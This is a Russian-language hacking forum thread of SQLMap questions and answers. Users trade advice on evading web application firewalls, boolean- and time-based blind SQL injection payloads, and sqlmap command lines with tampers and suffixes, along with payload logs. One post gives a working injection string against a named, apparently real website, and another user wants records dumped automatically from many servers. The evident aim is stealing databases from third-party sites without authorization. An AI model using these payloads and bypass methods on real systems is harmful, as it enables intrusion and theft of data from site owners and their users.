Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Смотря какой вид SQL инъекции, где и что еще дополнительно меняет/фильтрует запрос и тд. А так, да, руками Sucuri обходится, но с не большими нюансами, на счёт tamper скриптов от sqlmap не уверен, что там из стандартного набора получиться обойти без проблем и блокировки, разве что только переписать/написать свой.
    P.S. Вы плохо гуглите, информации из гугла по методам обходам WAF, хватит для обхода!
     
  2. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    88
    Reputations:
    7
    справится ли скулмап, если:

    1. можно выводить посимвольно, но отдает лишь код символа?
    Code:
    select ord(substring(upper(email),1,1)) from members
    2. если тайм-бесед, но ответ идет дольше в 2 раза, нежели мы слипим?
    Code:
    if(now()=sysdate(),sleep(6),0)  -> 12 sec
    if(now()=sysdate(),sleep(12),0) -> 24 sec
    
    3. Можно ли начать дамп данных с таблицы, но не с начала в конец, а с конца в начало? (не прибегая к сортировкам) чтобы limit шел с конца в начало

    4. Как можно пробрутить через sqlmap список стандартных лог файлов (дабы найти существующие), если есть права на чтнеие, и time-based? Читает нормально посимвольно
     
    #762 o314um, 9 Oct 2018
    Last edited: 9 Oct 2018
  3. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    88
    Reputations:
    7
    совсем все данные так выводятся?
    попробуй --hex
     
  4. vasyaz

    vasyaz New Member

    Joined:
    29 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Делаю любой дамп колонок выходит
    [09:08:59] [INFO] retrieving the length of query output
    [09:09:01] [INFO] retrieved:
    [09:09:02] [INFO] resumed: ?????????????????????

    --no-cast --hex - не помогло
     
  5. Ne0h16xor

    Ne0h16xor New Member

    Joined:
    13 Oct 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  6. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    88
    Reputations:
    7
    может одна "t" нужна?
    не проверял скулмапом
    ----
    --random-agentt: not found кто знает почему такая херня
     
  7. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    88
    Reputations:
    7
    а руками если в брайзер выводить - нормально?
     
  8. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    в слепой нет же вывода.

    --random-agent с одной "t"
     
  9. vasyaz

    vasyaz New Member

    Joined:
    29 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    В браузере вообще не выводится. Пробовал тамперы не помогло. Может есть какой то определенный тампер для этого? В этой теме видел, что у человека такая же проблема была, писал про кодировку.
    Еще выводится такая строчка...
    [22:49:09] [INFO] heuristics detected web page charset 'windows-1252'
    Выставлял --charset=utf8, --charset=windows-1251, --charset=windows-1252
     
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Посмотрите в сторону логов запрос/ответ, могу допустить, что на сервере стоит фаерволл и он блокирует попытки слить данные из БД, на что скрипт отвечает Вам ? символами такое часто случается. Или как вариант который уже советовали, что-то не так с запросом и скрипт должным образом не выполняется на сервере, возьмите 2 запроса из скрипта где он пытается получить какой-либо символ 1-true, 2-false и проверьте руками, все ли верно там с выводом данных на странице, ответом сервера и так далее!
    P.S. Попробуйте еще явно указать скрипту варианты по которым ему определять True или False запрос, например --code=200, --string="Antichat" (--not-string="Antichat"), --regex, --titles (если заголовок меняется) и так далее, это как очередное допущение, не более :)
     
  11. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    88
    Reputations:
    7
    а это не слепая.
    вот тебе вывод:
    Code:
    h00p://bunnycredits.com/index.php
    ?a=showproduct
    &id=gtid_subset(@@version,0)%23
    
    но там фильтраций много - так что голым скулмапом не выведет. Лучше руками придумать обходы
     
  12. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
    Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
    Code:
    --fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
    Code:
    back-end DBMS: MySQL unknown
    [09:35:14] [INFO] fetching database names
    [09:35:14] [INFO] fetching number of databases
    [09:35:14] [PAYLOAD] 1'"
    [09:35:14] [WARNING] reflective value(s) found and filtering out
    [09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
    [09:35:14] [INFO] retrieved:
    [09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
    [09:35:14] [ERROR] unable to retrieve the number of databases
    [09:35:14] [INFO] falling back to current database
    [09:35:14] [INFO] fetching current database
    [09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
    [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
    [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
    [09:35:15] [INFO] retrieved:
    [09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
    [09:35:15] [CRITICAL] unable to retrieve the database names
     
  13. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
  14. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
    Единственное, что еще нашел - на сервере установлен Suhosin patch , но они сразу пишут какой тампер использовать, я через него и раскрутил уязвимость , но вот с выводом беда (((
    Code:
    [10:16:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive
    [10:16:25] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
    [10:16:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: MySQL boolean-based blind - Parameter replace (bool*int)
        Payload: class=27&id=(1291=1291)*2659*/!'
    ---
     
  15. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Хочу сделать чтобы sqlmap автоматом вытягивал нужные мне записи из списка баз на каждом сервере.
    Подскажите, можно ли указать дамп нужных мне таблиц и колонок используя регулярные выражения? Пробовал --search, но он не работает в связке с --dump.
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,549
    Reputations:
    40
    Может есть смысл руками ?
     
  17. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Скажите, что делает суффикс -BR (--suffix="-BR")?
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    _________________________
    t0ma5 likes this.
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    810
    Reputations:
    90
    -BN часто юзают при консольном вызове mysql, дабы отключить форматирование, откуда "BR" и причем тут sqlmap, есть предыстория)?
     
    _________________________
    ms13 likes this.
  20. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Про сам суффикс это понятно, вопрос про его использование в контекста самого языка MySQL

     
Loading...